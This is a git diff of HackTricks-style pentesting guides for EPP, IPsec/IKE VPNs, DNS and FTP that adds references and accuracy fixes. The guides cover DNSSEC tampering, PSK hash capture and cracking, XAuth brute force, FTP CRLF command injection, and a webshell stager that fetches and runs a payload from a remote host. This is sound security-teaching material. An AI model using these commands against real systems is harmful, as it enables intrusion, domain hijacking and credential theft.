 - [10] [HTB: Sorcery](https://0xdf.gitlab.io/2026/04/25/htb-sorcery.html)
+- [11] [RabbitMQ documentation - AMQP 1.0](https://www.rabbitmq.com/docs/amqp)
+- [12] [RabbitMQ 4.3.1 release notes](https://github.com/rabbitmq/rabbitmq-server/releases/tag/v4.3.1)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/700-pentesting-epp.md
+++ b/src/network-services-pentesting/700-pentesting-epp.md
@@ -4,11 +4,11 @@
 
 ## Basic Information
 
-The **Extensible Provisioning Protocol (EPP)** is the XML-based standard protocol used by **registries** and **registrars** to manage domain objects (create, update, renew, transfer, delete, DNSSEC data, poll messages, etc.).
+The **Extensible Provisioning Protocol (EPP)** is an XML-based protocol used by **registries** and **registrars** to provision objects such as domains, hosts, and contacts. Extensions add functions such as DNSSEC management and lifecycle notifications.<sup>[[4]](#references)</sup>
 
 In practice, this is one of the most sensitive services in a TLD environment: if you can operate EPP as a registrar or abuse a registrar-facing control plane that proxies EPP actions, you can usually **change nameservers, rotate transfer credentials, alter DNSSEC state, or transfer domains away**.
 
-The classic transport is **TLS over TCP on port `700/tcp`**, usually with **mutual TLS**, source-IP restrictions, and an additional EPP `login` using a username/password. Each TCP message has a **4-byte big-endian length prefix** followed by the XML document, which matters when building custom probes or fuzzing gateways. However, do not assume the attack surface is limited to raw TCP on port 700 anymore: current IETF work is standardizing **EPP over HTTPS**, and some registries/clients already implement or test that model.
+The standardized transport is **TLS over TCP on port `700/tcp`**. Deployments commonly layer certificate-based client authentication, source-IP restrictions, and an EPP `login` username/password. Each data unit begins with a **four-byte big-endian total length** (including the length field), followed by the XML document. Current IETF work also defines **EPP over HTTPS**, so assessments should check documented web gateways rather than assume the surface is limited to raw TCP/700.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ### Pentest
 
@@ -80,7 +80,7 @@ If the server advertises a lot of extensions, the parser and authorization surfa
 
 ### Check for EPP over HTTPS
 
-The current EPP-over-HTTPS draft maps the greeting to an **HTTP `GET`** and subsequent commands to **HTTP `POST`**, with state tracked through **cookies / sticky sessions**. If the registry exposes this transport, you may see `Content-Type: application/epp+xml`, `Set-Cookie`, and cache-control headers in the greeting response.
+The current EPP-over-HTTPS Internet-Draft maps connection initiation/greeting retrieval to an **HTTP `GET`** and commands to **HTTP `POST`**, with state associated through a server cookie. Because this remains a draft, confirm behavior against the exact implementation and draft version. Indicators include `application/epp+xml`, `Set-Cookie`, and explicit cache controls.<sup>[[6]](#references)</sup>
 
 ```bash
 curl -isk https://<target>/ -H 'Accept: application/epp+xml'
@@ -132,7 +132,7 @@ If you obtain registrar-level access, these operations usually have the highest 
 | --- | --- |
 | `domain:update` | Change nameservers, contacts, statuses, or `authInfo` |
 | `domain:transfer` | Move the domain to another registrar or interfere with approval flows |
-| `domain:info` | Often reveals transfer state and, in some implementations/workflows, authorization material |
+| `domain:info` | Reveals object and transfer state; authorization material is subject to object mapping and server policy |
 | `secDNS:update` | Add/remove/replace DS or key data to break validation or control DNSSEC state |
 | `poll` | Observe asynchronous events: transfer approvals, registry actions, out-of-band changes |
 
@@ -176,7 +176,7 @@ Common real-world failures include:
 
 1. **Anonymous TLS is accepted**, and only the EPP `login` is enforced.
 2. A **reverse proxy terminates TLS**, but the backend does not require or correctly forward the verified client-certificate identity.
-3. A registrar client **does not validate the registry certificate** correctly, enabling credential theft or machine-in-the-middle attacks against the EPP `login`.
+3. A registrar client **does not validate the registry certificate** correctly, enabling credential theft or on-path interception of the EPP `login`.
 4. The service lacks **IP allowlists, connection quotas, or rate limits**, making low-and-slow password spraying practical.
 
 Because TCP EPP uses a length prefix, custom gateways and protocol relays are also worth fuzzing with **truncated**, **oversized**, or **desynchronized** frame lengths before the XML parser is reached.
@@ -195,7 +195,7 @@ The HTTP session and reverse proxy become part of the EPP security boundary, so 
 
 ### Legacy password model and the `loginSec` extension
 
-Base EPP historically limited the `pw` field to a short XML schema string, which is why [RFC 8807](https://datatracker.ietf.org/doc/rfc8807/) introduced the **Login Security Extension** for longer passwords/passphrases and machine-readable security events.
+Base EPP constrains `pw`/`newPW` to 6–16 characters. RFC 8807 introduced the **Login Security Extension**, which can carry longer server-policy-controlled passwords and machine-readable security events.<sup>[[4]](#references)[[7]](#references)</sup>
 
 When testing authenticated access, check whether the registry still behaves like an old deployment:
 
@@ -246,7 +246,7 @@ The secure model from RFC 9154 is: **strong random authInfo, short-lived, not st
 
 Once you have EPP access, do not stop at nameserver changes. Many operators forget that EPP also controls **DNSSEC state**.
 
-With [RFC 5910](https://datatracker.ietf.org/doc/html/rfc5910), a registrar can add/remove/replace **DS records** and key data via `secDNS`. That means a privileged attacker may be able to:
+With the EPP `secDNS` extension, a registrar can add or remove **DS records** and key data. A privileged attacker may therefore be able to:<sup>[[8]](#references)</sup>
 
 - remove DS material to intentionally break validation during takeover
 - replace DS/key data to match attacker-controlled signing keys
@@ -273,8 +273,8 @@ Minimal example of removing all existing DNSSEC material and adding attacker-con
 Modern EPP deployments increasingly rely on asynchronous workflows:
 
 - `poll` for queued messages
-- [RFC 8590](https://datatracker.ietf.org/doc/rfc8590/) for **Change Poll** (out-of-band object changes)
-- [RFC 9167](https://datatracker.ietf.org/doc/rfc9167/) for **Registry Maintenance Notification**
+- **Change Poll** for out-of-band object changes.<sup>[[9]](#references)</sup>
+- **Registry Maintenance Notification** for planned and emergency maintenance.<sup>[[10]](#references)</sup>
 
 These are valuable during an assessment because they often reveal:
 
@@ -348,5 +348,12 @@ Keep this short from an offensive perspective, but these are the controls that m
 - [1] [HackCompute - can I speak to your manager? hacking root EPP servers to take control of zones](https://hackcompute.com/hacking-epp-servers/)
 - [2] [RFC 9154 - Extensible Provisioning Protocol (EPP) Secure Authorization Information for Transfer](https://datatracker.ietf.org/doc/html/rfc9154)
 - [3] [USENIX Security 2025 - Misty Registry: An Empirical Study of Flawed Domain Registry Operation](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-mingming)
+- [4] [RFC 5730 – Extensible Provisioning Protocol (EPP)](https://www.rfc-editor.org/rfc/rfc5730)
+- [5] [RFC 5734 – EPP Transport over TCP](https://www.rfc-editor.org/rfc/rfc5734)
+- [6] [IETF Internet-Draft – EPP Transport over HTTPS](https://datatracker.ietf.org/doc/draft-ietf-regext-epp-https/)
+- [7] [RFC 8807 – Login Security Extension for EPP](https://www.rfc-editor.org/rfc/rfc8807)
+- [8] [RFC 5910 – Domain Name System Security Extensions Mapping for EPP](https://www.rfc-editor.org/rfc/rfc5910)
+- [9] [RFC 8590 – Change Poll Extension for EPP](https://www.rfc-editor.org/rfc/rfc8590)
+- [10] [RFC 9167 – Registry Maintenance Notification for EPP](https://www.rfc-editor.org/rfc/rfc9167)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md
+++ b/src/network-services-pentesting/ipsec-ike-vpn-pentesting.md
@@ -1,20 +1,18 @@
-# 500/udp - Pentesting IPsec/IKE VPN
+# 500/udp, 4500/udp - Pentesting IPsec/IKE VPN
 
 {{#include ../banners/hacktricks-training.md}}
 
 ## Basic Information
 
-**IPsec** is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions.
+**IPsec** is a suite of network-layer protocols used to protect traffic between hosts or security gateways. It is common in site-to-site and remote-access VPNs, but it is not the only enterprise VPN technology.<sup>[[11]](#references)</sup>
 
-The establishment of a **security association (SA)** between two points is managed by **IKE**, which operates under the umbrella of ISAKMP, a protocol designed for the authentication and key exchange. This process unfolds in several phases:
+**Internet Key Exchange (IKE)** authenticates peers and establishes Security Associations (SAs). IKEv1 used the ISAKMP framework and the historical phase terminology below; IKEv2 replaced that exchange model with `IKE_SA_INIT`, `IKE_AUTH`, and `CREATE_CHILD_SA` exchanges.<sup>[[11]](#references)[[12]](#references)</sup>
 
-- **Phase 1:** A secure channel is created between two endpoints. This is achieved through the use of a Pre-Shared Key (PSK) or certificates, employing either main mode, which involves three pairs of messages, or **aggressive mode**.
-- **Phase 1.5:** Though not mandatory, this phase, known as the Extended Authentication Phase, verifies the identity of the user attempting to connect by requiring a username and password.
-- **Phase 2:** This phase is dedicated to negotiating the parameters for securing data with **ESP** and **AH**. It allows for the use of algorithms different from those in Phase 1 to ensure **Perfect Forward Secrecy (PFS)**, enhancing security.
+- **IKEv1 Phase 1:** Main Mode (six messages) or Aggressive Mode (three messages) establishes the IKE/ISAKMP SA using authentication such as a PSK or certificate.
+- **Optional “Phase 1.5”:** XAuth is a vendor extension that performs additional user authentication, commonly with a username and password.
+- **IKEv1 Phase 2:** Quick Mode negotiates IPsec SAs for ESP or AH. ESP can provide confidentiality and integrity; AH provides integrity/authentication but not encryption. A fresh Diffie-Hellman exchange in Quick Mode provides PFS—merely choosing algorithms different from Phase 1 does not.<sup>[[11]](#references)</sup>
 
-**Default port:** 500/udp
-
-Also commonly exposed: 4500/udp (NAT Traversal)
+IKE normally uses UDP/500. NAT Traversal encapsulates IPsec ESP in UDP/4500 and also moves IKE traffic to that port after NAT detection.<sup>[[13]](#references)</sup>
 
 ## **Discover** the service using nmap
 
@@ -30,7 +28,7 @@ MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
 
 ## **Finding a valid transformation**
 
-The IPSec configuration can be prepared only to accept one or a few transformations. A transformation is a combination of values. **Each transform** contains a number of attributes like DES or 3DES as the **encryption algorithm**, SHA or MD5 as the **integrity algorithm**, a pre-shared key as the **authentication type**, Diffie-Hellman 1 or 2 as the key **distribution algorithm** and 28800 seconds as the **lifetime**.
+An IKEv1 policy may accept only specific transform combinations. A Phase 1 transform identifies attributes such as the encryption algorithm, integrity/hash algorithm, authentication method, Diffie-Hellman group, and lifetime. DES, 3DES, MD5, SHA-1, and DH groups 1/2 are legacy examples useful for identifying old appliances, not recommended choices for a new deployment.<sup>[[2]](#references)[[3]](#references)</sup>
 
 Then, the first thing that you have to do is to **find a valid transformation**, so the server will talk to you. To do so, you can use the tool **ike-scan**. By default, Ike-scan works in main mode, and sends a packet to the gateway with an ISAKMP header and a single proposal with **eight transforms inside it**.<sup>[[3]](#references)</sup>
 
@@ -50,11 +48,11 @@ Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 retur
 As you can see in the previous response, there is a field called **AUTH** with the value **PSK**. This means that the vpn is configured using a preshared key (and this is really good for a pentester).\
 **The value of the last line is also very important:**
 
-- _0 returned handshake; 0 returned notify:_ This means the target is **not an IPsec gateway**.
+- _0 returned handshake; 0 returned notify:_ This result is inconclusive. The host may not run IKE, but UDP filtering, packet loss, rate limiting, an unacceptable proposal, or an implementation that silently drops probes can look identical.
 - _**1 returned handshake; 0 returned notify:**_ This means the **target is configured for IPsec and is willing to perform IKE negotiation, and either one or more of the transforms you proposed are acceptable** (a valid transform will be shown in the output).
 - _0 returned handshake; 1 returned notify:_ VPN gateways respond with a notify message when **none of the transforms are acceptable** (though some gateways do not, in which case further analysis and a revised proposal should be tried).
 
-Then, in this case we already have a valid transformation but if you are in the 3rd case, then you need to **brute-force a little bit to find a valid transformation:**
+In this case a valid transform is already known. If only a rejection is returned, enumerate transforms carefully. The exhaustive legacy loop below generates a very large probe set and includes obsolete algorithms, so rate-limit it and use it only when explicitly authorized:
 
 First of all you need to create all the possible transformations:
 
@@ -87,11 +85,11 @@ You could also try to brute force transformations with [**ikeforce**](https://gi
 In **DH Group: 14 = 2048-bit MODP** and **15 = 3072-bit**\
 **2 = HMAC-SHA = SHA1 (in this case). The `--trans` format is $Enc,$Hash,$Auth,$DH**
 
-Cisco indicates to avoid using DH groups 1 and 2 because they're not strong enough. Experts believe that **countries with a lot of resources can easily break the encryption** of data that uses these weak groups. This is done by using a special method that prepares them to crack the codes quickly. Even though it costs a lot of money to set up this method, it allows these powerful countries to read the encrypted data in real time if it's using a group that's not strong (like 1,024-bit or smaller).
+DH group 1 uses 768-bit MODP and group 2 uses 1024-bit MODP; both are obsolete. Group 14 is 2048-bit MODP and group 15 is 3072-bit MODP. Large-scale precomputation research makes common weak finite-field groups particularly risky, and current deployments should follow vendor/IETF guidance for modern groups and algorithms.
 
 ### Server fingerprinting
 
-Then, you can use ike-scan to try to **discover the vendor** of the device. The tool send an initial proposal and stops replaying. Then, it will **analyze** the **time** difference **between** the received **messages** from the server and the matching response pattern, the pentester can successfully fingerprint the VPN gateway vendor. More over, some VPN servers will use the optional **Vendor ID (VID) payload** with IKE.<sup>[[3]](#references)</sup>
+You can use `ike-scan` to estimate the implementation from its retransmission/backoff timing and optional Vendor ID (VID) payloads. Fingerprints can collide or change across firmware, proxies, and packet-loss conditions, so treat the result as a hypothesis to corroborate.<sup>[[3]](#references)</sup>
 
 **Specify the valid transformation if needed** (using --trans)
 
@@ -149,8 +147,7 @@ Notes
 
 ## Finding the correct ID (group name)
 
-For being allowed to capture the hash you need a valid transformation supporting Aggressive mode and the correct ID (group name). You probably won't know the valid group name, so you will have to brute-force it.\
-To do so, I would recommend you 2 methods:
+To capture an offline-crackable IKEv1 Aggressive Mode PSK exchange, you need an accepted transform and an identity/group configuration for which the gateway completes the response. Some gateways reveal different behavior for valid and invalid group IDs; others deliberately make the responses indistinguishable.
 
 ### Bruteforcing ID with ike-scan
 
@@ -160,7 +157,7 @@ First of all try to make a request with a fake ID trying to gather the hash ("-P
 ike-scan -P -M -A -n fakeID <IP>
 ```
 
-If **no hash is returned**, then probably this method of brute forcing will work. **If some hash is returned, this means that a fake hash is going to be sent back for a fake ID, so this method won't be reliable** to brute-force the ID. For example, a fake hash could be returned (this happens in modern versions):
+If no hash is returned for random IDs but one is returned for a candidate, the response difference may provide an enumeration signal. If equivalent handshakes are returned for fake IDs, this method cannot reliably distinguish group names. Confirm with multiple controls to account for loss and rate limiting.
 
 ![Finding the correct ID (group name) - Bruteforcing ID with ike-scan: If no hash is returned , then probably this method of brute forcing will work. If some hash is returned, this means...](<../images/image (917).png>)
 
@@ -184,19 +181,19 @@ vpnIDs.txt
 
 ### Bruteforcing ID with Iker
 
-[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) also uses **ike-scan** to bruteforce possible group names. It follows it's own method to **find a valid ID based on the output of ike-scan**.
+[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py) also uses **ike-scan** to brute-force possible group names. It applies its own heuristics to infer a valid ID from `ike-scan` output.
 
 ### Bruteforcing ID with ikeforce
 
 [**ikeforce.py**](https://github.com/SpiderLabs/ikeforce) is a tool that can be used to **brute force IDs also**. This tool will **try to exploit different vulnerabilities** that could be used to **distinguish between a valid and a non-valid ID** (could have false positives and false negatives, that is why I prefer to use the ike-scan method if possible).
 
-By default **ikeforce** will send at the beginning some random ids to check the behaviour of the server and determinate the tactic to use.
+By default **ikeforce** first sends random IDs to characterize server behavior and choose an enumeration tactic.
 
-- The **first method** is to brute-force the group names by **searching** for the information **Dead Peer Detection DPD** of Cisco systems (this info is only replayed by the server if the group name is correct).
-- The **second method** available is to **checks the number of responses sent to each try** because sometimes more packets are sent when the correct id is used.
-- The **third method** consist on **searching for "INVALID-ID-INFORMATION" in response to incorrect ID**.
+- The **first method** searches for Cisco Dead Peer Detection (DPD) information that some implementations return only for an accepted group name.
+- The **second method** compares the number of responses because some implementations send additional packets for an accepted ID.
+- The **third method** looks for `INVALID-ID-INFORMATION` responses to rejected IDs.
 - Finally, if the server does not replay anything to the checks, **ikeforce** will try to brute force the server and check if when the correct id is sent the server replay with some packet.\
-  Obviously, the goal of brute forcing the id is to get the **PSK** when you have a valid id. Then, with the **id** and **PSK** you will have to bruteforce the XAUTH (if it is enabled).
+  The goal is to identify a group whose Aggressive Mode exchange can be captured and tested offline. Recovering the PSK still depends on its guessability. XAuth, when enabled, is a separate user-authentication layer and must be assessed within the lockout/rate limits in scope.
 
 If you have discovered an specific transformation add it in the ikeforce command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of them is working properly).
 
@@ -224,21 +221,21 @@ ike-scan -A <IP>
 # Look for: ID(Type=ID_USER_FQDN, Value=ike@corp.tld)
 ```
 
-If Aggressive Mode is enabled, capture a crackable PSK handshake and crack it offline (hashcat mode `5400`):
+If Aggressive Mode is enabled, capture a PSK exchange and test it offline. Hashcat mode `5400` is for IKE-PSK SHA-1; use the mode matching the negotiated hash (for example, `5300` for MD5):
 
 ```bash
 ike-scan -A --pskcrack=handshake.txt <IP>
 hashcat -m 5400 handshake.txt /path/to/wordlist.txt
 ```
 
-Recovered PSKs are often **reused** as credentials for other services (SSH, VPN client auth), so test them against exposed services.<sup>[[6]](#references)</sup>
+A recovered group PSK is not inherently a user password. In an authorized assessment, record it as a reusable shared secret and test other services only when the rules of engagement explicitly include credential reuse.<sup>[[6]](#references)</sup>
 
 ## Capturing & cracking the hash
 
 Finally, If you have found a **valid transformation** and the **group name** and if the **aggressive mode is allowed**, then you can very easily grab the crackable hash:<sup>[[1]](#references)</sup>
 
 ```bash
-ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor
+ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> # Capture the PSK-auth exchange for offline testing
 ```
 
 The hash will be saved inside _hash.txt_.
@@ -263,11 +260,11 @@ So you can capture the data of the login using _fiked_ and see if there is any d
 fiked -g <IP> -k testgroup:secretkey -l output.txt -d
 ```
 
-Also, using IPSec try to make a MitM attack and block all traffic to port 500, if the IPSec tunnel cannot be established maybe the traffic will be sent in clear.
+Blocking UDP/500 or UDP/4500 should make a correctly configured VPN client fail closed. If business traffic silently falls back to a non-VPN path, that is a separate fail-open/routing weakness; verify it with packet capture without assuming credentials or payloads will automatically be sent in clear.
 
-### Brute-forcing XAUTH username ad password with ikeforce
+### Brute-forcing XAuth usernames and passwords with ikeforce
 
-To brute force the **XAUTH** (when you know a valid group name **id** and the **psk**) you can use a username or list of usernames and a list o passwords:
+To test **XAuth** when you know a valid group ID and PSK, provide a username (or username list) and password list. Respect account lockout and gateway rate limits:
 
 ```bash
 ./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]
@@ -383,5 +380,8 @@ Operational notes:
 - [8] [RFC 7383 - Internet Key Exchange Protocol Version 2 (IKEv2) Message Fragmentation](https://datatracker.ietf.org/doc/rfc7383/)
 - [9] [Microsoft Security Update Guide - CVE-2026-33824](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-33824)
 - [10] [opensourceforu.com - Ipsec Vpn Penetration Testing Backtrack Tools](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools)
+- [11] [RFC 2409 – The Internet Key Exchange (IKEv1)](https://www.rfc-editor.org/rfc/rfc2409)
+- [12] [RFC 7296 – Internet Key Exchange Protocol Version 2 (IKEv2)](https://www.rfc-editor.org/rfc/rfc7296)
+- [13] [RFC 3947 – Negotiation of NAT-Traversal in IKE](https://www.rfc-editor.org/rfc/rfc3947)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-dns.md
+++ b/src/network-services-pentesting/pentesting-dns.md
@@ -3,7 +3,7 @@
 {{#include ../banners/hacktricks-training.md}}
 
 
-## **Basic Information**
+## Basic information
 
 The **Domain Name System (DNS)** serves as the internet's directory, allowing users to access websites through **easy-to-remember domain names** like google.com or facebook.com, instead of the numeric Internet Protocol (IP) addresses. By translating domain names into IP addresses, the DNS ensures web browsers can quickly load internet resources, simplifying how we navigate the online world.
 
@@ -16,10 +16,10 @@ PORT     STATE SERVICE  REASON
 53/udp   open  domain  Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
 ```
 
-### Different DNS Servers
+### Different DNS servers
 
-- **DNS Root Servers**: These are at the top of the DNS hierarchy, managing the top-level domains and stepping in only if lower-level servers do not respond. The Internet Corporation for Assigned Names and Numbers (**ICANN**) oversees their operation, with a global count of 13.
-- **Authoritative Nameservers**: These servers have the final say for queries in their designated zones, offering definitive answers. If they can't provide a response, the query is escalated to the root servers.
+- **DNS root servers**: These servers are at the top of the public DNS hierarchy and return referrals for top-level domains. There are 13 named root-server identifiers (`A` through `M`), each implemented by many anycast instances; this does not mean that only 13 physical servers exist.<sup>[[2]](#references)</sup>
+- **Authoritative nameservers**: These servers provide authoritative answers for their configured zones, including answers, referrals for delegated child zones, or negative responses. A recursive resolver—not the authoritative server—walks the hierarchy when further lookup is required.
 - **Non-authoritative Nameservers**: Lacking ownership over DNS zones, these servers gather domain information through queries to other servers.
 - **Caching DNS Server**: This type of server memorizes previous query answers for a set time to speed up response times for future requests, with the cache duration dictated by the authoritative server.
 - **Forwarding Server**: Serving a straightforward role, forwarding servers simply relay queries to another server.
@@ -29,7 +29,7 @@ PORT     STATE SERVICE  REASON
 
 ### **Banner Grabbing**
 
-There aren't banners in DNS but you can gran the magic query for `version.bind. CHAOS TXT` which will work on most BIND nameservers.\
+DNS has no conventional service banner, but some BIND servers answer the `version.bind. CHAOS TXT` query. Administrators can disable or replace this value, so an empty or customized response is not conclusive.\
 You can perform this query using `dig`:
 
 ```bash
@@ -46,7 +46,7 @@ It's also possible to grab the banner also with a **nmap** script:
 
 ### **Any record**
 
-The record **ANY** will ask the DNS server to **return** all the available **entries** that **it is willing to disclose**.
+An **`ANY`** query asks the DNS server to return whatever record set it is willing and able to provide; modern authoritative servers may intentionally return a minimal response rather than every record.<sup>[[4]](#references)</sup>
 
 ```bash
 dig any victim.com @<DNS_IP>
@@ -54,7 +54,7 @@ dig any victim.com @<DNS_IP>
 
 ### **Zone Transfer**
 
-This procedure is abbreviated `Asynchronous Full Transfer Zone` (`AXFR`).
+`AXFR` is the DNS mechanism for transferring a complete zone from an authoritative server.<sup>[[3]](#references)</sup>
 
 ```bash
 dig axfr @<DNS_IP> #Try zone transfer without domain
@@ -117,7 +117,7 @@ dnsrecon -d active.htb -a -n <IP_DNS> #Zone transfer
 ```
 
 > [!TIP]
-> If you are able to find subdomains resolving to internal IP-addresses, you should try to perform a reverse dns BF to the NSs of the domain asking for that IP range.
+> If subdomains resolve to internal IP addresses, try reverse-DNS brute force against the domain's nameservers for the relevant address range.
 
 Another tool to do so: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan)
 
@@ -160,7 +160,7 @@ Brute force using "AAAA" requests to gather IPv6 of the subdomains.
 dnsdict6 -s -t <domain>
 ```
 
-Bruteforce reverse DNS in using IPv6 addresses
+Brute-force reverse DNS with IPv6 addresses:
 
 ```bash
 dnsrevenum6 pri.authdns.ripe.net 2001:67c:2e8::/48 #Will use the dns pri.authdns.ripe.net
@@ -175,7 +175,7 @@ The way to **check** if a DNS supports **recursion** is to query a domain name a
 dig google.com A @<IP>
 ```
 
-**Non available**:
+**Recursion unavailable:**
 
 ![IPv6 - DNS Recursion DDoS: dig google.com A @](<../images/image (123).png>)
 
@@ -320,11 +320,11 @@ curl -s "https://crt.sh/?q=%25.example.com&output=json" | head
 
 ### Mail to nonexistent account
 
-**Sending an email to a non-existaent address** using the victims domain could trigger the victim to send a nondelivery notification (NDN) message whose **headers** could contain interesting information such as the **name of internal servers and IP addresses**.
+**Sending an email to a nonexistent address** in the target's domain may trigger a nondelivery notification whose headers disclose internal server names or IP addresses.
 
 ## Post-Exploitation
 
-- When checking the configuration of a Bind server check the configuration of the param **`allow-transfer`** as it indicates who can perform zone transfers and **`allow-recursion`** and **`allow-query`** as the indicate who can send recursive requests and requests to it.
+- When reviewing a BIND server, inspect **`allow-transfer`** to determine who can request zone transfers, and **`allow-recursion`** and **`allow-query`** to determine who can send recursive and general queries.
 - The following are the names of DNS related files that could be interesting to search inside machines:
 
 ```
@@ -395,6 +395,8 @@ Entry_6:
 ## References
 
 - [1] [DNS (Domain Name System): definition, function, risks](https://www.myrasecurity.com/en/knowledge-hub/dns/)
+- [2] [IANA – Root Servers](https://www.iana.org/domains/root/servers)
+- [3] [RFC 5936 – DNS Zone Transfer Protocol (AXFR)](https://www.rfc-editor.org/rfc/rfc5936)
+- [4] [RFC 8482 – Minimal Responses to DNS Queries That Have QTYPE=ANY](https://www.rfc-editor.org/rfc/rfc8482)
 
 {{#include ../banners/hacktricks-training.md}}
-

--- a/src/network-services-pentesting/pentesting-ftp/README.md
+++ b/src/network-services-pentesting/pentesting-ftp/README.md
@@ -2,10 +2,10 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basic information<sup>[[7]](#references)</sup>
 
-The **File Transfer Protocol (FTP)** serves as a standard protocol for file transfer across a computer network between a server and a client.\
-It is a **plain-text** protocol that uses as **new line character `0x0d 0x0a`** so sometimes you need to **connect using `telnet`** or **`nc -C`**.
+The **File Transfer Protocol (FTP)** is a standard protocol for transferring files between a client and server over a computer network.\
+Its control channel is **plaintext** and terminates lines with CRLF (`0x0d 0x0a`), so raw testing may require **Telnet** or **`nc -C`**.
 
 **Default Port:** 21
 
@@ -14,19 +14,19 @@ PORT   STATE SERVICE
 21/tcp open  ftp
 ```
 
-### Connections Active & Passive
+### Active and passive connections
 
-In **Active FTP** the FTP **client** first **initiates** the control **connection** from its port N to FTP Servers command port – port 21. The **client** then **listens** to port **N+1** and sends the port N+1 to FTP Server. FTP **Server** then **initiates** the data **connection**, from **its port M to the port N+1** of the FTP Client.
+In **active FTP**, the **client** initiates the control connection from its port N to the FTP server's command port, TCP/21. The client then listens on a data port and advertises it to the server with `PORT` or `EPRT`. The **server initiates the data connection** to the client's advertised port.
 
-But, if the FTP Client has a firewall setup that controls the incoming data connections from outside, then active FTP may be a problem. And, a feasible solution for that is Passive FTP.
+Active FTP can fail when a client-side firewall blocks inbound data connections. Passive FTP avoids this issue by having the client initiate both connections.
 
-In **Passive FTP**, the client initiates the control connection from its port N to the port 21 of FTP Server. After this, the client issues a **passv comand**. The server then sends the client one of its port number M. And the **client** **initiates** the data **connection** from **its port P to port M** of the FTP Server.<sup>[[6]](#references)</sup>
+In **passive FTP**, the client initiates the control connection to TCP/21 and issues `PASV` or `EPSV`. The server returns a listening data port, and the client initiates the data connection to that server port.<sup>[[6]](#references)[[7]](#references)</sup>
 
 Source: [https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/](https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/)<sup>[[6]](#references)</sup>
 
 ### Connection debugging
 
-The **FTP** commands **`debug`** and **`trace`** can be used to see **how is the communication occurring**.
+The FTP client's **`debug`** and **`trace`** commands can show how the communication occurs.
 
 ## Enumeration
 
@@ -57,7 +57,7 @@ With **nmap**
 sudo nmap -sV -p21 -sC -A 10.10.10.10
 ```
 
-You can us the commands `HELP` and `FEAT` to obtain some information of the FTP server:
+Use `HELP` and `FEAT` to obtain information about the FTP server:
 
 ```
 HELP
@@ -117,21 +117,21 @@ Here you can find a nice list with default ftp credentials: [https://github.com/
 
 ### Automated
 
-Anon login and bounce FTP checks are perform by default by nmap with **-sC** option or:
+Nmap performs anonymous-login and FTP-bounce checks with the **`-sC`** option, or you can invoke all FTP scripts explicitly:
 
 ```bash
 nmap --script ftp-* -p 21 <ip>
 ```
 
-## Browser connection
+## FTP URL handling
 
-You can connect to a FTP server using a browser (like Firefox) using a URL like:
+An FTP URL has the following form, although current browsers no longer provide built-in FTP clients; Firefox removed FTP support in version 90. Use a dedicated client such as `lftp` or FileZilla instead.<sup>[[8]](#references)</sup>
 
 ```bash
 ftp://anonymous:anonymous@10.10.10.98
 ```
 
-Note that if a **web application** is sending data controlled by a user **directly to a FTP server** you can send double URL encode `%0d%0a` (in double URL encode this is `%250d%250a`) bytes and make the **FTP server perform arbitrary actions**. One of this possible arbitrary actions is to download content from a users controlled server, perform port scanning or try to talk to other plain-text based services (like http).
+If a **web application** sends user-controlled data directly to an FTP server, double-encoded CRLF bytes (`%250d%250a`) may permit FTP command injection. Possible effects include downloading content from an attacker-controlled server, scanning ports, or interacting with another plaintext protocol such as HTTP.
 
 
 ### Wing FTP Server (web client RCE + credential recovery)
@@ -211,29 +211,29 @@ wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/
 - After uploading, trigger an **architecture-aware download/exec stager** via the shell, for example: `webshell.php?dmc=(wget -qO - http://<compromised_host_ip>/.x/?x=x86 || curl http://<compromised_host_ip>/.x/?x=x86)`, which fetches a checksum-validated payload, saves it (e.g., `init_start`), sets `chmod +x`, and runs it.
 - If the current directory is not writable/executable, the stager falls back to `/tmp`, so test web paths and filesystem permissions after upload.
 
-## Some FTP commands
+## Some FTP commands<sup>[[7]](#references)</sup>
 
 - **`USER username`**
 - **`PASS password`**
 - **`HELP`** The server indicates which commands are supported
-- **`PORT 127,0,0,1,0,80`** This will indicate the FTP server to establish a connection with the IP 127.0.0.1 in port 80 (_you need to put the 5th char as "0" and the 6th as the port in decimal or use the 5th and 6th to express the port in hex_).
-- **`EPRT |2|127.0.0.1|80|`** This will indicate the FTP server to establish a TCP connection (_indicated by "2"_) with the IP 127.0.0.1 in port 80. This command **supports IPv6**.
+- **`PORT 127,0,0,1,0,80`** tells the FTP server to connect to 127.0.0.1 on port 80. The final two decimal fields encode the 16-bit port as `p1*256 + p2`.
+- **`EPRT |1|127.0.0.1|80|`** tells the FTP server to establish a TCP connection to IPv4 address 127.0.0.1 on port 80. Address-family value `2` selects IPv6.
 - **`LIST`** This will send the list of files in current folder
   - **`LIST -R`** List recursively (if allowed by the server)
 - **`APPE /path/something.txt`** This will indicate the FTP to store the data received from a **passive** connection or from a **PORT/EPRT** connection to a file. If the filename exists, it will append the data.
 - **`STOR /path/something.txt`** Like `APPE` but it will overwrite the files
-- **`STOU /path/something.txt`** Like `APPE`, but if exists it won't do anything.
